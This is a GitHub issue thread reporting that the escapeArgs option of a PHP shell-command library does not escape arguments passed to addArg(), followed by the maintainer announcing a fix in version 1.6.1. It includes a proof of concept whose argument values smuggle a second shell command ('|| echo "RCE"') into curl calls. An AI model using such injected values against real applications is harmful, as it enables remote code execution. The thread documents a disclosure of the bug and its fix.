escapeArgs option is not working properly

[Kirill89]

I expect that addArg() escapes all arguments preventing possibility of command injection from untrusted sources.

Because in the README.md I see:

• Handle argument escaping

• $escapeArgs: Whether to escape any argument passed through addArg(). Default is true.

But it is not actually happens.

PoC:

<?php
require_once 'vendor/autoload.php';

use mikehaertl\shellcommand\Command;

$command = new Command(array(
    'command' => 'curl',
    'escapeArgs' => true,
));
// In this example "escapeArgs" is set to "true", but escaping is not happens.
$command->addArg('http://example.com --wrong-argument || echo "RCE 1"');
$command->execute();
echo $command->getOutput(); // RCE 1

$command = new Command(array(
    'command' => 'curl http://example.com',
    'escapeArgs' => true,
));
$command->addArg('http://example.com');
// In this example, the second argument will be escaped properly, but the first one - not.
$command->addArg('--header foo --wrong-argument || echo "RCE 2" ||', 'bar');
$command->execute();
echo $command->getOutput(); // RCE 2

Disclaimer

This thread was initially started as a private email conversation. @mikehaertl asked me to open an issue here.

[mikehaertl]

Thanks. If you have an idea for a fix, please let me know or provide a MR. Some examples of the expected output would also be great. I could add it to the tests so we can verify that the problem is fixed later.

[mikehaertl]

Released 1.6.1 containing this fix. Thanks for bringing this up!